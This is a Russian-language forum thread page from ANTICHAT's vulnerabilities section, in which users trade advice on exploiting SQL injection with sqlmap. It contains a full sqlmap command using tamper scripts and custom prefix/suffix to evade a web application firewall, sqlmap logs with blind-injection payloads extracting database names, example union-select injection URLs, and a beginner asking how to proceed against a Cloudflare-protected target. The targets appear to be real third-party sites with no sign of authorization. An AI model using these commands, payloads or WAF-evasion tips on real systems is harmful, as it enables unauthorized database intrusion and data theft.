HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #771  
Старый 03.11.2018, 16:12
BabaDook
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
Провел на форуме:
238786

Репутация: 40


По умолчанию

Цитата:
Сообщение от msk_smail  

Добрый день! Раскрутил SQL но WAF не дает список получить, пробовал no-cast и hex с тамперами - ничего не помогает , подскажите как быть ?
Код:
--fresh-queries --tamper=unionalltounion --prefix="111'/*!40222" --suffix="*/!'" --no-cast -v 3 --level=5 --risk=3 -p id --batch --dbs
Код:
back-end DBMS: MySQL unknown
[09:35:14] [INFO] fetching database names
[09:35:14] [INFO] fetching number of databases
[09:35:14] [PAYLOAD] 1'"
[09:35:14] [WARNING] reflective value(s) found and filtering out
[09:35:14] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[09:35:14] [PAYLOAD] (ORD(MID((SELECT COUNT(DISTINCT(schema_name)) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>51)*9950*/!'
[09:35:14] [PAYLOAD] (ORD(MID((SELECT COUNT(DISTINCT(schema_name)) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>48)*9950*/!'
[09:35:14] [PAYLOAD] (ORD(MID((SELECT COUNT(DISTINCT(schema_name)) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>9)*9950*/!'
[09:35:14] [INFO] retrieved:
[09:35:14] [DEBUG] performed 3 queries in 0.23 seconds
[09:35:14] [ERROR] unable to retrieve the number of databases
[09:35:14] [INFO] falling back to current database
[09:35:14] [INFO] fetching current database
[09:35:14] [PAYLOAD] (ORD(MID((DATABASE()),1,1))>64)*1021*/!'
[09:35:15] [PAYLOAD] (ORD(MID((DATABASE()),1,1))>32)*1021*/!'
[09:35:15] [PAYLOAD] (ORD(MID((DATABASE()),1,1))>1)*1021*/!'
[09:35:15] [INFO] retrieved:
[09:35:15] [DEBUG] performed 3 queries in 0.22 seconds
[09:35:15] [CRITICAL] unable to retrieve the database names
Может есть смысл руками ?
 
Ответить с цитированием

  #772  
Старый 04.11.2018, 00:30
loidez
Новичок
Регистрация: 28.02.2018
Сообщений: 19
Провел на форуме:
4255

Репутация: 0
По умолчанию

Скажите, что делает суффикс -BR (--suffix="-BR")?
 
Ответить с цитированием

  #773  
Старый 04.11.2018, 11:23
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию

Цитата:
Сообщение от loidez  

Скажите, что делает суффикс -BR (--suffix="-BR")?
добавляет окончание ко всем твоим реквестам

http://site/injection.php?param=1+union+select+123-BR

http://site/injection.php?param=1+un...t+@@version-BR

идея понятна?
 
Ответить с цитированием

  #774  
Старый 04.11.2018, 15:43
t0ma5
Постоянный
Регистрация: 10.02.2012
Сообщений: 830
Провел на форуме:
300820

Репутация: 90


По умолчанию

Цитата:
Сообщение от loidez  

Скажите, что делает суффикс -BR (--suffix="-BR")?
-BN часто юзают при консольном вызове mysql, дабы отключить форматирование, откуда "BR" и причем тут sqlmap, есть предыстория)?
 
Ответить с цитированием

  #775  
Старый 04.11.2018, 16:32
loidez
Новичок
Регистрация: 28.02.2018
Сообщений: 19
Провел на форуме:
4255

Репутация: 0
По умолчанию

Цитата:
Сообщение от BigBear  

добавляет окончание ко всем твоим реквестам
http://site/injection.php?param=1+union+select+123-BR
http://site/injection.php?param=1+un...t+@@version-BR
идея понятна?
Про сам суффикс это понятно, вопрос про его использование в контекста самого языка MySQL

Цитата:
Сообщение от None  
To pass the validation and successfully exploit this SQLi, we must inject our payload between the numerical value and the "-BR" suffix. This is a typical Blind SQL Injection
 
Ответить с цитированием

  #776  
Старый 04.11.2018, 16:42
t0ma5
Постоянный
Регистрация: 10.02.2012
Сообщений: 830
Провел на форуме:
300820

Репутация: 90


По умолчанию

Цитата:
Сообщение от loidez  

Про сам суффикс это понятно, вопрос про его использование в контекста самого языка MySQL
значение суфикса аномальное, о чем я уже отписался выше. "вопрос про его использование в контекста самого языка MySQL" его используют чтобы кастомезировать выборку из базы, прикрутить лимит или какое то неординарное условие. по факту --suffix просто добавляет строку в конец запроса, о чем собственно сообщил BigBear
 
Ответить с цитированием

  #777  
Старый 11.11.2018, 17:26
aZohan
Новичок
Регистрация: 10.06.2017
Сообщений: 19
Провел на форуме:
4687

Репутация: 0
По умолчанию

Цитата:
Сообщение от msk_smail  

помог отдельно взятый тампер unionalltounion и --hex, причем в связке с другими тамперами он не срабатывал, только как отдельный, список таблиц сразу преобразился, спасибо
Приветствую, как вы пришли к решению включить именно этот тампер?
 
Ответить с цитированием

  #778  
Старый 11.11.2018, 17:35
Sensoft
Постоянный
Регистрация: 14.06.2015
Сообщений: 396
Провел на форуме:
104689

Репутация: 1
По умолчанию

Цитата:
Сообщение от msk_smail  

помог отдельно взятый тампер unionalltounion и --hex, причем в связке с другими тамперами он не срабатывал, только как отдельный, список таблиц сразу преобразился, спасибо
Спасибо, этот тампер помог слепую раскрутить, версию определяло, а дальше не шло дело, подрубил этот тампер и сразу всё раскрутило.
 
Ответить с цитированием

  #779  
Старый 16.11.2018, 06:02
717u717
Новичок
Регистрация: 16.12.2015
Сообщений: 27
Провел на форуме:
8326

Репутация: 0
По умолчанию

Всем привет.

Выдало такие данные, можно ли тут что нибудь сделать?

[11:47:24] [INFO] testing connection to the target URL

[11:47:24] [WARNING] potential permission problems detected ('Access denied')

[11:47:24] [WARNING] the web server responded with an HTTP error code (403) which could interfere with the results of the tests

[11:47:24] [INFO] checking if the target is protected by some kind of WAF/IPS

[11:47:24] [INFO] heuristics detected web page charset 'ascii'

[11:47:24] [CRITICAL] heuristics detected that the target is protected by some kind of WAF/IPS

do you want sqlmap to try to detect backend WAF/IPS? [y/N] y

[11:51:05] [WARNING] dropping timeout to 10 seconds (i.e. '--timeout=10')

[11:51:06] [INFO] using WAF scripts to detect backend WAF/IPS protection

[11:51:26] [CRITICAL] WAF/IPS identified as 'CloudFlare Web Application Firewall (CloudFlare)'

are you sure that you want to continue with further target testing? [y/N] y

[11:56:24] [WARNING] please consider usage of tamper scripts (option '--tamper')

[11:56:24] [INFO] testing if the target URL content is stable

[11:56:44] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s)
 
Ответить с цитированием

  #780  
Старый 16.11.2018, 13:54
717u717
Новичок
Регистрация: 16.12.2015
Сообщений: 27
Провел на форуме:
8326

Репутация: 0
По умолчанию

я в этом деле новичок, не подскажешь конкретно что это и что с этим можно сделать?

Изменяюсь за нубские вопросы.
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.